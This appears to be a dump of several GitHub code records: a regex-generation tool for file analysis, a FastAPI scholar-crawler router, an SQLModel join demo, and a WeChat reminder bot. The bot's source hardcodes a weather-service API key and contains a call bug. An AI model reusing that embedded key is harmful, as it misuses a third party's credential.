regexStr = regexStr + \"]\"\r\n\r\n #print( regexStr )\r\n #print( index, len(list(posSet[index])) )\r\n if not badRegexStr:\r\n #print( regexStr )\r\n self.regStrList.append(regexStr)\r\n\r\n def GenerateRegexReport(self):\r\n self.Update()\r\n self.GenerateRegStrList() \r\n\r\n #check if postitive files exist\r\n for x in list(self.corpusFiles):\r\n if not isfile(self.corpusFiles[x].fullName):\r\n print(\"ERROR: File no longer exists: \" + self.corpusFiles[x].fullName )\r\n exit(-1)\r\n #check if negative files exist\r\n for x in list(self.corpusNegFiles):\r\n if not isfile(self.corpusNegFiles[x].fullName):\r\n print(\"ERROR: File no longer exists: \" + self.corpusNegFiles[x].fullName )\r\n exit(-1)\r\n\r\n regStr = {self.window : [] }\r\n reportText = []\r\n reportText.append(\"################ Begin Scope Size:\" + str(self.window) + \" ################\")\r\n reportText.append(\"###### Begin Pre-Prune Test ######\")\r\n posResults = {}\r\n posHits = {}\r\n negResults = {}\r\n negHits = {}\r\n badSet = []\r\n posScore = 0\r\n negScore = 0\r\n reportText.append(\"# Number of regStr in regStrList before pruning: \" + str(len(self.regStrList)))\r\n for x in list(self.corpusFiles):\r\n fullName = self.corpusFiles[x].fullName\r\n \r\n reportText.append( \"### Begin File: \" + fullName )\r\n f = io.open(fullName, mode=\"r\", encoding=\"utf-8\")\r\n text = f.read()\r\n num = 0\r\n score = 0\r\n while num < len(self.regStrList):\r\n pattern = re.compile(self.regStrList[num])\r\n patternScore = len(re.findall(pattern, text))\r\n if num not in list(posResults):\r\n posResults[num] = patternScore\r\n else:\r\n posResults[num] = posResults[num] + patternScore\r\n if num not in list(posHits):\r\n posHits[num] = 1\r\n else:\r\n posHits[num] = posHits[num] + 1\r\n reportText.append( \"# regStr Score: \" + str(patternScore) + \" regStr: \" + self.regStrList[num] )\r\n score = score + patternScore\r\n posScore = posScore + patternScore\r\n num = num + 1\r\n reportText.append( \"# Overall Score: \" + str(score) )\r\n reportText.append( \"### End File: \" + fullName )\r\n\r\n for x in list(self.corpusNegFiles):\r\n fullName = self.corpusNegFiles[x].fullName\r\n reportText.append( \"### Begin File: \" + fullName )\r\n f = io.open(fullName, mode=\"r\", encoding=\"utf-8\")\r\n text = f.read()\r\n num = 0\r\n score = 0\r\n while num < len(self.regStrList):\r\n pattern = re.compile(self.regStrList[num])\r\n patternScore = len(re.findall(pattern, text))\r\n if num not in list(negResults):\r\n negResults[num] = patternScore\r\n else:\r\n negResults[num] = negResults[num] + patternScore\r\n if num not in list(negHits):\r\n negHits[num] = 1\r\n else:\r\n negHits[num] = negHits[num] + 1\r\n reportText.append( \"# regStr Score: \" + str(patternScore) + \" regStr: \" + self.regStrList[num] )\r\n score = score + patternScore\r\n negScore = negScore + patternScore\r\n num = num + 1\r\n reportText.append( \"# Overall Score: \" + str(score) )\r\n reportText.append( \"### End File: \" + fullName )\r\n reportText.append(\"###### End Pre-Prune Test ######\")\r\n\r\n num = 0\r\n if posScore == 0:\r\n reportText.append(\"# Zero hits in the positive files for the regStr generated for this scope. 
Try again with a smaller scope value.\") \r\n else:\r\n hitTF = {}\r\n #Prune weak regStr \r\n while num < len(self.regStrList):\r\n posTF = posResults[num] / posScore\r\n if negScore != 0:\r\n negTF = negResults[num] / negScore\r\n else:\r\n negTF = 0\r\n \r\n if negScore != 0 and posTF <= negTF:\r\n badSet.append(num)\r\n elif negScore != 0 and posResults[num] <= negResults[num]:\r\n badSet.append(num)\r\n else:\r\n #Prune longer regStr that have same performance as a shorter regStr \r\n if posTF in list(hitTF):\r\n if len(self.regStrList[hitTF[posTF]]) > len(self.regStrList[num]):\r\n badSet.append(hitTF[posTF])\r\n hitTF[posTF] = num\r\n else:\r\n badSet.append(num)\r\n else:\r\n hitTF[posTF] = num\r\n num = num + 1\r\n\r\n reportText.append(\"###### Begin Post-Prune Test ######\")\r\n reportText.append(\"# Number of regStr in regStrList after pruning: \" + str(len(self.regStrList) - len(badSet)))\r\n \r\n for x in list(self.corpusFiles):\r\n fullName = self.corpusFiles[x].fullName\r\n reportText.append( \"### Begin File: \" + fullName )\r\n f = io.open(fullName, mode=\"r\", encoding=\"utf-8\")\r\n text = f.read()\r\n num = 0\r\n score = 0\r\n while num < len(self.regStrList):\r\n if num not in badSet:\r\n pattern = re.compile(self.regStrList[num])\r\n patternScore = len(re.findall(pattern, text))\r\n reportText.append( \"# regStr Score: \" + str(patternScore) + \" regStr: \" + self.regStrList[num] )\r\n score = score + patternScore\r\n num = num + 1\r\n reportText.append( \"# Overall Score: \" + str(score) )\r\n reportText.append( \"### End File: \" + fullName )\r\n\r\n for x in list(self.corpusNegFiles):\r\n fullName = self.corpusNegFiles[x].fullName\r\n reportText.append( \"### Begin File: \" + fullName )\r\n f = io.open(fullName, mode=\"r\", encoding=\"utf-8\")\r\n text = f.read()\r\n num = 0\r\n score = 0\r\n while num < len(self.regStrList):\r\n if num not in badSet:\r\n pattern = re.compile(self.regStrList[num])\r\n patternScore = len(re.findall(pattern, text))\r\n reportText.append( \"# regStr Score: \" + str(patternScore) + \" regStr: \" + self.regStrList[num] )\r\n score = score + patternScore\r\n num = num + 1\r\n reportText.append( \"# Overall Score: \" + str(score) )\r\n reportText.append( \"### End File: \" + fullName )\r\n reportText.append(\"###### End Post-Prune Test ######\")\r\n reportText.append(\"################ End Scope Size:\" + str(self.window) + \" ################\")\r\n \r\n num = 0\r\n while num < len(self.regStrList):\r\n if num not in badSet:\r\n regStr[self.window].append(self.regStrList[num])\r\n num = num + 1\r\n return regStr, reportText\r\n\r\n\r\n\r\nclass File:\r\n def __init__(self, sha256, name):\r\n self.sha256 = sha256\r\n self.fullName = name\r\n self.terms = {}\r\n\r\n def __eq__(self, other):\r\n return self.sha256 == other.sha256\r\n \r\n\r\n\r\nclass Term:\r\n def __init__(self, Value ):\r\n self.Value = Value\r\n self.Neighbors = []\r\n self.Count = 1\r\n self.UniHex = str(\"\\\\\\\\\") + \"x{\" + str(format( ord(Value), '04x')) +\"}\"\r\n \r\n def __eq__(self, other):\r\n return self.Value == other.Value\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('-p', '--positive', type=str, help='Directory containing files for the Positive set (what you want to detect)', required=True)\r\n parser.add_argument('-n', '--negative', type=str, help='Directory containing files for the Negative set (what you *dont* want to detect)', default=\"\")\r\n parser.add_argument('-o', '--output', type=str, 
help='Output file name, where the training report and results will be sent. Appends output if file exists already.', required=True)\r\n parser.add_argument('-s', '--scope', type=int, help='Number of characters included before AND after the key character. A higher number in scope will increase RAM usage! Defaults to 3', default=3)\r\n parser.add_argument(\"-r\", \"--rerun\", action=\"store_true\", help=\"After first run, decrement the scope and re-run until scope is zero\")\r\n parser.add_argument(\"-d\", \"--detail\", action=\"store_true\", help=\"Increase report output details, shows per regStr per file scores, file total scores, and results from before AND after pruning\")\r\n parser.add_argument(\"-f\", \"--force\", action=\"store_true\", help=\"Force proceed when -s/--scope is greater than 5\")\r\n args = parser.parse_args()\r\n\r\n #Validate supplied args\r\n if not isdir(args.positive):\r\n print(\"ERROR: Directory does not exist : \" + args.positive )\r\n exit(-1)\r\n if args.negative != \"\" and not isdir(args.negative):\r\n print(\"ERROR: Directory does not exist : \" + args.negative )\r\n exit(-1)\r\n if not args.force and args.scope > 5 :\r\n print(\"WARNING: scope is greater than 5 which will use more RAM, add -f/--force flag to proceed\")\r\n exit(-2)\r\n if args.scope <= 0 :\r\n print(\"ERROR: scope is less than 1. Scope needs to be between 1 and 5, if greater than 5 add -f/--force flag to proceed\")\r\n exit(-1)\r\n\r\n outputFile = open(args.output,\"a+\")\r\n \r\n\r\n #Create a new RegexReport for this run\r\n newReport = RegexReport()\r\n \r\n\r\n if args.rerun:\r\n runNum = args.scope\r\n minNum = 1\r\n else:\r\n runNum = args.scope\r\n minNum = args.scope\r\n \r\n while( runNum >= minNum ):\r\n #start with supplied window scope \r\n NewCorpus = Corpus(runNum)\r\n\r\n mypath = args.positive\r\n onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]\r\n for fullName in onlyfiles:\r\n fullName = mypath + fullName\r\n NewCorpus.AddPosFile(fullName)\r\n \r\n if args.negative != \"\":\r\n mypath = args.negative\r\n onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]\r\n for fullName in onlyfiles:\r\n fullName = mypath + fullName\r\n NewCorpus.AddNegFile(fullName)\r\n \r\n curReport = NewCorpus.GenerateRegexReport()\r\n \r\n for x in curReport[1]:\r\n newReport.reportText.append(x)\r\n newReport.regStr[NewCorpus.window] = curReport[0][NewCorpus.window]\r\n \r\n runNum = runNum - 1\r\n\r\n #Write Report\r\n if args.detail:\r\n for line in newReport.reportText:\r\n outputFile.write(line + \"\\n\")\r\n outputFile.write(\"############ Begin RegStr Output ############\\n\")\r\n for x in list(newReport.regStr):\r\n outputFile.write(\"###### Begin Scope Output: \" + str(x) + \" ######\\n\")\r\n for y in newReport.regStr[x]:\r\n outputFile.write(y + \"\\n\")\r\n outputFile.write(\"###### End Scope Output: \" + str(x) + \" ######\\n\") \r\n outputFile.write(\"############ End RegStr Output ############\\n\")\r\n\r\n\r\n\r\n\r\n", "repo_name": "infosecsmith/file-analysis", "sub_path": "RegexGenerator.py", "file_name": "RegexGenerator.py", "file_ext": "py", "file_size_in_byte": 20611, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "hashlib.sha256", "line_number": 57, "usage_type": "call"}, {"api_name": "io.open", "line_number": 58, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 98, "usage_type": "call"}, {"api_name": "io.open", "line_number": 99, 
"usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 209, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 214, "usage_type": "call"}, {"api_name": "io.open", "line_number": 234, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 239, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 240, "usage_type": "call"}, {"api_name": "io.open", "line_number": 259, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 264, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 265, "usage_type": "call"}, {"api_name": "io.open", "line_number": 317, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 323, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 324, "usage_type": "call"}, {"api_name": "io.open", "line_number": 334, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 340, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 341, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 382, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 393, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 396, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 425, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 425, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 425, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 432, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 432, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 432, "usage_type": "call"}]}
+{"seq_id": "3718275408", "text": "from fastapi import APIRouter, Depends, status\nfrom fastapi.exceptions import HTTPException\nfrom fastapi_jwt_auth import AuthJWT\nfrom schema.api_schema import crawlInput\nfrom crawler.crawler import dyn_crawl\nfrom db.database import Session, engine\nfrom db.models import History\nimport datetime\n\n\n# create db session \nsession = Session(bind=engine)\n\n\n# creatte crawler router instance for web crawler\ncrawler_router = APIRouter(\n prefix='/crawl',\n tags=['CRAWL']\n)\n\n# crawl route\n@crawler_router.get('/crawl' ,status_code=status.HTTP_200_OK)\nasync def crawl(crawl_values: crawlInput, Authorize: AuthJWT=Depends()): \n \n \"\"\"\n ## crawl google scholar \n This requires the following\n ```\n keyword:str\n no_of_article:int\n allow_links:bool\n allow_authors:bool\n allow_summary:bool\n ```\n It also requires an access token from login.\n \"\"\"\n \n try:\n # request access token from authorized user\n Authorize.jwt_required()\n\n except Exception as e:\n raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED, \n detail='unauthorized token')\n\n # crawl google scholar with user defined requirements\n result = dyn_crawl(keyword=crawl_values.keyword, no_articles=int(crawl_values.no_of_article),\n links=crawl_values.allow_links, author=crawl_values.allow_authors, \n summary=crawl_values.allow_summary)\n \n current_user = Authorize.get_jwt_subject()\n \n # record user crawler history to db\n new_history=History(\n username=current_user,\n keyword=crawl_values.keyword,\n date=datetime.datetime.now(datetime.timezone.utc)\n )\n session.add(new_history)\n\n session.commit()\n return {\"result\": result }\n \n\n# history route \n@crawler_router.get('/history' ,status_code=status.HTTP_200_OK)\nasync def history(Authorize: AuthJWT=Depends()): \n\n \"\"\"\n ## user crawl history\n This queries a users crawl history from database. 
It requires a access token from login.\n \"\"\"\n try:\n # request access token from authorized user\n Authorize.jwt_required()\n\n except Exception as e:\n raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED, \n detail='unauthorized token')\n \n current_user = Authorize.get_jwt_subject()\n\n # query db for specific user's crawler history\n hist_data = session.query(History.date, History.keyword).filter(History.username == current_user).all()\n\n return {f\"history data for {current_user}\": hist_data}\n \n\n", "repo_name": "Bee0933/scholar-api", "sub_path": "api/crawl_routes.py", "file_name": "crawl_routes.py", "file_ext": "py", "file_size_in_byte": 2723, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "db.database.Session", "line_number": 12, "usage_type": "call"}, {"api_name": "db.database.engine", "line_number": 12, "usage_type": "name"}, {"api_name": "fastapi.APIRouter", "line_number": 16, "usage_type": "call"}, {"api_name": "schema.api_schema.crawlInput", "line_number": 23, "usage_type": "name"}, {"api_name": "fastapi_jwt_auth.AuthJWT", "line_number": 23, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 23, "usage_type": "call"}, {"api_name": "fastapi.exceptions.HTTPException", "line_number": 43, "usage_type": "call"}, {"api_name": "fastapi.status.HTTP_401_UNAUTHORIZED", "line_number": 43, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 43, "usage_type": "name"}, {"api_name": "crawler.crawler.dyn_crawl", "line_number": 47, "usage_type": "call"}, {"api_name": "db.models.History", "line_number": 54, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 57, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 57, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 57, "usage_type": "attribute"}, {"api_name": "fastapi.status.HTTP_200_OK", "line_number": 22, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 22, "usage_type": "name"}, {"api_name": "fastapi_jwt_auth.AuthJWT", "line_number": 67, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 67, "usage_type": "call"}, {"api_name": "fastapi.exceptions.HTTPException", "line_number": 78, "usage_type": "call"}, {"api_name": "fastapi.status.HTTP_401_UNAUTHORIZED", "line_number": 78, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 78, "usage_type": "name"}, {"api_name": "db.models.History.date", "line_number": 84, "usage_type": "attribute"}, {"api_name": "db.models.History", "line_number": 84, "usage_type": "name"}, {"api_name": "db.models.History.keyword", "line_number": 84, "usage_type": "attribute"}, {"api_name": "db.models.History.username", "line_number": 84, "usage_type": "attribute"}, {"api_name": "fastapi.status.HTTP_200_OK", "line_number": 66, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 66, "usage_type": "name"}]}
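Both routes above repeat the same guard: jwt_required() inside try/except, mapped to a 401 on failure. A minimal standalone version of that protected-route pattern with fastapi_jwt_auth (the secret key and route body are placeholders; a real deployment should load the key from configuration):

from fastapi import FastAPI, Depends, HTTPException, status
from fastapi_jwt_auth import AuthJWT
from pydantic import BaseModel

app = FastAPI()

class Settings(BaseModel):
    authjwt_secret_key: str = 'change-me'   # placeholder secret

@AuthJWT.load_config
def get_config():
    return Settings()

@app.get('/protected')
def protected(Authorize: AuthJWT = Depends()):
    try:
        Authorize.jwt_required()   # raises if the token is missing or invalid
    except Exception:
        raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED,
                            detail='unauthorized token')
    return {'user': Authorize.get_jwt_subject()}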
+{"seq_id": "42052405544", "text": "from pydantic import BaseModel\nfrom typing import List, Optional\nimport uvicorn\nfrom fastapi import FastAPI\nfrom sqlmodel import Field, Session, SQLModel, create_engine, select\nfrom models.hero import Hero\nfrom models.team import Team\n\n# from sqlmodel.orm import join\n\nsqlite_file_name = \"database.db\"\nsqlite_url = f\"sqlite:///{sqlite_file_name}\"\n\nengine = create_engine(sqlite_url, echo=True, connect_args={\"check_same_thread\": False})\n\n\ndef create_db_and_tables():\n SQLModel.metadata.create_all(engine)\n\n\nclass TeamDto(BaseModel):\n name: str\n headquarters: str\n heroes: List[Hero]\n\nclass HeroDto(BaseModel):\n name: str\n secret_name: str\n age: int\n team_id: int\n\n\n\n\n\n\napp = FastAPI()\n\n\n@app.on_event(\"startup\")\nasync def table_all():\n create_db_and_tables()\n\n\n@app.get(\"/\")\ndef Hello():\n return \"Hello\"\n\n\n@app.get(\"/team\", response_model=List[Team])\nasync def getAllTeam():\n db = Session(engine)\n query = db.query(Team).join(Hero).all()\n\n response = {\n \"status\": 'success',\n \"data\": query\n } \n\n return query\n\n\n\n@app.get(\"/heroes\")\nasync def getAllHeroes():\n db = Session(engine)\n query= select(Hero, Team).join(Team)\n\n heroes = db.exec(query).all()\n\n return {\"heroes\": heroes}\n\n\n@app.post(\"/team\")\nasync def createTeam(team: TeamDto):\n db = Session(engine)\n db_team = Team(\n name=team.name,\n headquarters=team.headquarters\n )\n\n \n\n db.add(db_team)\n\n db.commit()\n\n response = {\n \"status\": \"success\"\n }\n\n return response\n\n\n@app.post(\"/heroes\")\nasync def createHeroes(hero: HeroDto):\n db = Session(engine)\n\n db_heroes = Hero(\n name=hero.name,\n secret_name=hero.secret_name,\n age=hero.age,\n team_id=hero.team_id\n )\n\n db.add(db_heroes)\n db.commit()\n\n response = {\n \"status\": \"Success\"\n }\n\n return response\n\n \n \nif __name__ == \"__main__\":\n uvicorn.run(\"main:app\", reload=True)\n\n\n", "repo_name": "renaldyhidayatt/simplejoinSqlModel", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1963, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlmodel.create_engine", "line_number": 14, "usage_type": "call"}, {"api_name": "sqlmodel.SQLModel.metadata.create_all", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlmodel.SQLModel.metadata", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sqlmodel.SQLModel", "line_number": 18, "usage_type": "name"}, {"api_name": "pydantic.BaseModel", "line_number": 21, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 24, "usage_type": "name"}, {"api_name": "models.hero.Hero", "line_number": 24, "usage_type": "name"}, {"api_name": "pydantic.BaseModel", "line_number": 26, "usage_type": "name"}, {"api_name": "fastapi.FastAPI", "line_number": 37, "usage_type": "call"}, {"api_name": "sqlmodel.Session", "line_number": 52, "usage_type": "call"}, {"api_name": "models.hero.Hero", "line_number": 53, "usage_type": "argument"}, {"api_name": "models.team.Team", "line_number": 53, "usage_type": "argument"}, {"api_name": "typing.List", "line_number": 50, "usage_type": "name"}, {"api_name": "models.team.Team", "line_number": 50, "usage_type": "name"}, {"api_name": "sqlmodel.Session", "line_number": 66, "usage_type": "call"}, {"api_name": "models.team.Team", "line_number": 67, "usage_type": "argument"}, {"api_name": "sqlmodel.select", "line_number": 67, "usage_type": "call"}, 
{"api_name": "models.hero.Hero", "line_number": 67, "usage_type": "argument"}, {"api_name": "sqlmodel.Session", "line_number": 76, "usage_type": "call"}, {"api_name": "models.team.Team", "line_number": 77, "usage_type": "call"}, {"api_name": "sqlmodel.Session", "line_number": 97, "usage_type": "call"}, {"api_name": "models.hero.Hero", "line_number": 99, "usage_type": "call"}, {"api_name": "uvicorn.run", "line_number": 118, "usage_type": "call"}]}
+{"seq_id": "16480670949", "text": "# encoding: utf-8\n\nimport _thread\nfrom datetime import datetime\n\nimport itchat, time\nimport requests\nfrom itchat.content import *\nfrom apscheduler.schedulers.blocking import BlockingScheduler\n\n# 自动登陆,命令行二维码,退出程序后暂存登陆状态\nfrom DateUtil import get_week_day\n\ntimes = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))\n\nitchat.auto_login(enableCmdQR=2, hotReload=True)\n\n# 获取指定好友\ncarling = itchat.search_friends(nickName='Carling')[0]['UserName']\nbiu = itchat.search_friends(nickName='Biu')[0]['UserName']\nalpha_meow = itchat.search_chatrooms(name='阿尔法猫')[0]['UserName']\n\nsched = BlockingScheduler()\n\n\n# 阿尔法猫本体\ndef meow(threadName, delay):\n print('meow方法启动')\n\n # 监听普通消息\n @itchat.msg_register([TEXT, MAP, CARD, NOTE, SHARING])\n def text_reply(msg):\n print('普通消息:')\n print(msg)\n\n # 监听群聊事件\n @itchat.msg_register(TEXT, isGroupChat=True)\n def text_reply(msg):\n print('群组:')\n print(msg)\n if msg['isAt']:\n text = msg['Text']\n act_name = msg['ActualNickName']\n if str(text).find('提醒') > 0:\n new_jobs(sched, text, act_name)\n elif str(text).find('天气') > 0:\n weather(text)\n\n # itchat.send_msg(notice, toUserName=biu)\n # 保持登陆状态\n itchat.run()\n\n\ndef jobs(threadName, delay):\n print('jobs方法启动')\n # 添加任务\n # day_of_week = 'mon-fri' 表示从周一到周五\n # 订餐 - 每周六12点、21点提醒我订一星期的饭\n sched.add_job(func=job_ordering, trigger='cron', day_of_week='sat', hour=12, minute=00)\n sched.add_job(func=job_ordering, trigger='cron', day_of_week='sat', hour=21, minute=00)\n # 午餐\n sched.add_job(func=job_have_lunch, trigger='cron', day_of_week='mon-fri', hour=11, minute=45)\n # 午睡 - 每天中午12点45分提醒我睡觉\n sched.add_job(func=job_siesta, trigger='cron', day_of_week='mon-fri', hour=12, minute=45)\n # 种树 - 每天七点半提醒我收能量\n sched.add_job(func=job_plant_trees, trigger='cron', day_of_week='mon-fri', hour=7, minute=30)\n # 下班\n sched.add_job(func=job_plant_trees, trigger='cron', day_of_week='mon-fri', hour=17, minute=55)\n # 喂鸡 - 每隔4小时提醒我喂鸡\n sched.add_job(func=job_siesta, trigger='interval', hours=4, minutes=30)\n # 休息\n sched.add_job(func=job_rest, trigger='interval', minutes=30)\n sched.start()\n\n\n# 午餐\ndef job_have_lunch():\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n阿尔法猫提醒你:到点吃饭啦\\n'\n itchat.send_msg(notice, toUserName=alpha_meow)\n\n\n# 订餐提醒定时器\ndef job_ordering():\n ordering_url = 'http://hy.dmeiwei.com/wx/wxgetcodeurl_dczx.asp'\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n阿尔法猫提醒你:小嘉琳记得公司订餐呐\\n' \\\n '链接是:\\n' + ordering_url + '\\n请现在立刻马上行动起来!'\n itchat.send_msg(notice, toUserName=alpha_meow)\n\n\n# 午睡提醒器\ndef job_siesta():\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n阿尔法猫提醒你:已经到午休时间啦,你们快点去睡觉觉/睡'\n itchat.send_msg(notice, toUserName=alpha_meow)\n\n\n# 种树\ndef job_plant_trees():\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n阿尔法猫提醒你:快去支付宝收能量啦,不然要被偷走了'\n itchat.send_msg(notice, toUserName=alpha_meow)\n\n\n# 喂鸡提醒器\ndef job_feeding_chickens():\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n阿尔法猫提醒你:要去看看鸡仔饿了没有哦'\n itchat.send_msg(notice, toUserName=alpha_meow)\n\n\n# 下班\ndef job_off_duty():\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n阿尔法猫提醒你:到点下班回家撸猫啦'\n itchat.send_msg(notice, toUserName=alpha_meow)\n\n\n# 休息\ndef job_rest():\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n阿尔法猫提醒你:别太忙了,要起来走走动动,喝杯水,休息一下。'\n itchat.send_msg(notice, 
toUserName=alpha_meow)\n\n\n# Create a new reminder job\ndef new_jobs(sched, text, act_name):\n    arr = text.split('/')\n    date_format = arr[1]\n    date = arr[2]\n    obj = arr[4]\n    todo = arr[-1]\n\n    itchat.send_msg('阿尔法猫已经收到信息了,新建了一个任务\\n时间是:' + date + \"\\n任务内容是:\" + todo, toUserName=alpha_meow)\n\n    if date_format == 'longtime':\n        t_struct = time.strptime(date, \"%Y-%m-%d %H:%M:%S\")\n        sched.add_job(func=job_notice, trigger='date',\n                      run_date=datetime(t_struct.tm_year, t_struct.tm_mon, t_struct.tm_mday,\n                                        t_struct.tm_hour, t_struct.tm_min, t_struct.tm_sec),\n                      args=[obj, act_name, todo])\n\n\ndef job_notice(obj='我', act_name=None, todo=None):\n    if obj == '我':\n        obj = act_name\n\n    notice = '现在是北京时间:' + times() + \" \" + get_week_day(datetime.now()) \\\n             + '\\n阿尔法猫提醒你:' + todo + '\\n @' + obj + ' '\n    itchat.send_msg(notice, toUserName=alpha_meow)\n\n\ndef weather(msg):\n    arr = msg.split('/')\n    # default to '今天' (today) when no city is given\n    location = arr[1] if len(arr) > 1 else '今天'\n    if location == '今天':\n        location = '广州'\n\n    args = {'location': location, 'key': '12d04dfd2f514c158f6b69291225576e'}\n    res = requests.get(\"https://free-api.heweather.net/s6/weather/now\", params=args)\n    if res.status_code == 200:\n        result = res.json()\n        # apparent (feels-like) temperature, in degrees Celsius\n        fl = result['HeWeather6'][0].get('now')['fl']\n        # air temperature, in degrees Celsius\n        tmp = result['HeWeather6'][0].get('now')['tmp']\n        # description of the current weather conditions\n        cond_txt = result['HeWeather6'][0].get('now')['cond_txt']\n\n        if int(fl) <= 20:\n            remind = '记得多穿点衣服哦'\n        elif int(fl) >= 28:\n            remind = '记得多补水,注意防晒'\n        else:\n            remind = '要开开心心的呢'\n\n        notice = '现在是北京时间:' + times() + \" \" + get_week_day(datetime.now()) \\\n                 + '\\n' + location + '天气:' + cond_txt + \",气温:\" + tmp + \"°C,体感温度:\" + fl + '°C' \\\n                 + '\\n阿尔法猫提醒你:' + remind\n        itchat.send_msg(notice, toUserName=alpha_meow)\n    else:\n        notice = '天气预报异常啦,Biubiu快去看看'\n        itchat.send_msg(notice, toUserName=alpha_meow)\n\n\n# Start the two worker threads\ntry:\n    _thread.start_new_thread(meow, (\"Thread-1\", 2,))\n    _thread.start_new_thread(jobs, (\"Thread-2\", 4,))\nexcept:\n    print(\"Error: unable to start thread\")\n\nwhile 1:\n    pass\n\n# File transfer helper\n# itchat.send('hello world', toUserName='filehelper')\n", "repo_name": "biuhe/wechat-robot", "sub_path": "login.py", "file_name": "login.py", "file_ext": "py", "file_size_in_byte": 7247, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "time.strftime", "line_number": 14, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 14, "usage_type": "call"}, {"api_name": "time.time", "line_number": 14, "usage_type": "call"}, {"api_name": "itchat.auto_login", "line_number": 16, "usage_type": "call"}, {"api_name": "itchat.search_friends", "line_number": 19, "usage_type": "call"}, {"api_name": "itchat.search_friends", "line_number": 20, "usage_type": "call"}, {"api_name": "itchat.search_chatrooms", "line_number": 21, "usage_type": "call"}, {"api_name": "apscheduler.schedulers.blocking.BlockingScheduler", "line_number": 23, "usage_type": "call"}, {"api_name": "itchat.msg_register", "line_number": 31, "usage_type": "call"}, {"api_name": "itchat.msg_register", "line_number": 37, "usage_type": "call"}, {"api_name": "itchat.run", "line_number": 51, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 78, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 78, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 78, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 80, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", 
"line_number": 86, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 86, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 86, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 89, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 94, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 94, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 94, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 96, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 101, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 101, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 101, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 103, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 108, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 108, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 108, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 110, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 115, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 115, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 115, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 117, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", 